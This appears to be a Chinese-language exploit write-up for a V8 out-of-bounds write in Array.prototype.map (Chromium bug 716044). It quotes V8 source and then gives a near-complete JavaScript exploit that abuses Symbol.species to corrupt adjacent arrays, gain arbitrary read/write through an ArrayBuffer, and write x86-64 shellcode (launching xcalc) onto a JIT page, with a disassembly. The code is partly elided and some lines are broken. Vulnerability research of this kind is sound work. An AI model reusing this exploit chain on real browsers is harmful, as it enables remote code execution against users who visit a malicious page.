namespace v8 {
namespace internal {
class ArrayBuiltinCodeStubAssembler : public CodeStubAssembler {
void GenerateIteratingArrayBuiltinBody(
const char* name, const BuiltinResultGenerator
[ ... ]
// 1. Let O be ToObject(this value).
// 2. ReturnIfAbrupt(O)
o_ = CallStub(CodeFactory::ToObject(isolate()), context(), receiver());//【1】
// 3. Let len be ToLength(Get(O, "length")).
// 4. ReturnIfAbrupt(len).
VARIABLE(merged_length, MachineRepresentation::kTagged);
Label has_length(this,
GotoIf(DoesntHaveInstanceType(o(), JS_ARRAY_TYPE), ¬_js_array);
merged_length.Bind(LoadJSArrayLength(o())); //【2.1】
Node* len_property =
GetProperty(context(), o(), isolate()->factory()->length_string());
CallStub(CodeFactory::ToLength(isolate()), context(), len_property));
len_ = merged_length.value(); //【2.2】
[ ... ]
a_.Bind(generator(this)); //【3】
HandleFastElements(processor, action,
[ ... ]
• o_就是this指针的值
• len_是o_的length
• a_是保存map结果的array
• HandleFastElements 执行map的操作,对o_的每个元素都调用一次processor然后把结果写入a_
看下generator 对应的函数
Node* MapResultGenerator() {
// 5. Let A be ? ArraySpeciesCreate(O, len).
return ArraySpeciesCreate(context(), o(), len_);
Node* CodeStubAssembler::ArraySpeciesCreate(Node* context, Node* originalArray,
Node* len) {
// TODO(mvstanton): Install a fast path as well, which avoids the runtime
// call.
Node* constructor =
CallRuntime(Runtime::kArraySpeciesConstructor, context, originalArray);
return ConstructJS(CodeFactory::Construct(isolate()), context, constructor,
其中,ConstructJS的参数constructor 是通过Array[@@species]得到的,上面也提了,The Array[@@species] accessor property returns the Array constructor.

我们可以通过定义自己的Array type覆写construct
BranchIfFastJSArray(a(), context(), FastJSArrayAccessMode::ANY_ACCESS,
kind = EnsureArrayPushable(a(),
elements = LoadElements(a());
GotoIf(IsElementsKindGreaterThan(kind, FAST_HOLEY_SMI_ELEMENTS),
TryStoreArrayElement(FAST_SMI_ELEMENTS, mode,
我们走fast,可以跳过BranchIfFastJSArray 检查,然后就可以越界写了
关于对象在v8中的存储方式可以看这里奇技淫巧学 V8 之二,对象在 V8 内的表达
以下来自Exploiting a V8 OOB write
|a_ BuggyArray (0x80) | a_ FixedArray (0x18) | oob_rw JSArray (0x30) |
|oob_rw FixedDoubleArray (0x20) | leak JSArray (0x30) | leak FixedArray (0x18) |
|arb_rw ArrayBuffer |
var code = function() {
return 1;
class BuggyArray extends Array {
constructor(len) {
oob_rw = new Array(1.1, 1.1);//浮点数是FixedDoubleArray,改oobrw的length,泄露下面的leak,以及修改arb_rw的backing store pointer去任意读写
leak = new Array(code); //用来leak出函数地址,用来写入shellcode
arb_rw = new ArrayBuffer(4);//buffer
}; //看过v8中的对象布局后,对照这里定义看上面的排布图
• 通过越界读,修改length构造出任意读写
• 覆写JIT page上的一部分代码,也即写入shellcode
• 调用对应函数执行shellcode
var js_function_addr = oob_rw[10]; // JSFunction for code() in the `leak` FixedArray.
// v8 exploit for
var oob_rw = null;
var leak = null;
var arb_rw = null;
var code = function() {
return 1;
class BuggyArray extends Array {
constructor(len) {
oob_rw = new Array(1.1, 1.1); //浮点数是FixedDoubleArray
leak = new Array(code); //用来leak出函数地址,用来写入shellcode
arb_rw = new ArrayBuffer(4); //buffer
class MyArray extends Array {
static get [Symbol.species]() {
return BuggyArray;
var convert_buf = new ArrayBuffer(8);
var float64 = new Float64Array(convert_buf);
var uint8 = new Uint8Array(convert_buf);
var uint32 = new Uint32Array(convert_buf);
function Uint64Add(dbl, to_add_int) {
float64[0] = dbl;
var lower_add = uint32[0] + to_add_int;
if (lower_add > 0xffffffff) {
uint32[1] += 1;
uint32[0] = lower_add;
return float64[0];
// Memory layout looks like this:
// ================================================================================
// |a_ BuggyArray (0x80) | a_ FixedArray (0x18) | oob_rw JSArray (0x30) |
// --------------------------------------------------------------------------------
// |oob_rw FixedDoubleArray (0x20) | leak JSArray (0x30) | leak FixedArray (0x18) |
// --------------------------------------------------------------------------------
// |arb_rw ArrayBuffer |
// ================================================================================
var myarray = new MyArray();
myarray.length = 9;
myarray[4] = 42;
myarray[8] = 42;
//修改oob_rw的length,从上方截图可以看到 { return 1000000; });
//oob read to get func addr, and we can write it to shellcode
var js_function_addr = oob_rw[10]; // JSFunction for code()
// Set arb_rw's kByteLengthOffset to something big.
uint32[0] = 0;
uint32[1] = 1000000;
oob_rw[14] = float64[0];
// Set arb_rw's kBackingStoreOffset to
// js_function_addr + JSFunction::kCodeEntryOffset - 1
// (to get rid of Object tag)
oob_rw[15] = Uint64Add(js_function_addr, 56-1);
//convert to float
var js_function_uint32 = new Uint32Array(arb_rw);
uint32[0] = js_function_uint32[0];
uint32[1] = js_function_uint32[1];
oob_rw[15] = Uint64Add(float64[0], 128); // 128 = code header size
//write shellcode
// pop /usr/bin/xcalc
var shellcode = new Uint32Array(arb_rw);
shellcode[0] = 0x90909090;
shellcode[1] = 0x90909090;
shellcode[2] = 0x782fb848;
shellcode[3] = 0x636c6163; //xcalc
shellcode[4] = 0x48500000;
shellcode[5] = 0x73752fb8;
shellcode[6] = 0x69622f72;
shellcode[7] = 0x8948506e;
shellcode[8] = 0xc03148e7;
shellcode[9] = 0x89485750;
shellcode[10] = 0xd23148e6;
shellcode[11] = 0x3ac0c748;
shellcode[12] = 0x50000030; //我改为了0x50000031
shellcode[13] = 0x4944b848;
shellcode[14] = 0x414c5053;
shellcode[15] = 0x48503d59;
shellcode[16] = 0x3148e289;
shellcode[17] = 0x485250c0;
shellcode[18] = 0xc748e289;
shellcode[19] = 0x00003bc0;
shellcode[20] = 0x050f00;
//execute shellcode
0: 90 nop
1: 90 nop
2: 90 nop
3: 90 nop #(省略四个nop)
4: 48 b8 2f 78 63 61 6c movabs rax, 0x636c6163782f #/xcalc
b: 63 00 00
e: 50 push rax
f: 48 b8 2f 75 73 72 2f movabs rax, 0x6e69622f7273752f #/usr/bin
16: 62 69 6e
19: 50 push rax
1a: 48 89 e7 mov rdi, rsp
1d: 48 31 c0 xor rax, rax
20: 50 push rax
21: 57 push rdi
22: 48 89 e6 mov rsi, rsp
25: 48 31 d2 xor rdx, rdx
28: 48 c7 c0 3a 30 00 00 mov rax, 0x303a # :0 改为->0x313a
2f: 50 push rax
30: 48 b8 44 49 53 50 4c movabs rax, 0x3d59414c50534944
37: 41 59 3d
3a: 50 push rax
3b: 48 89 e2 mov rdx, rsp
3e: 48 31 c0 xor rax, rax
41: 50 push rax
42: 52 push rdx
43: 48 89 e2 mov rdx, rsp
46: 48 c7 c0 3b 00 00 00 mov rax, 0x3b
4d: 0f 05 syscall

716044 - V8: OOB write in builtin - chromium
Exploiting a V8 OOB write. (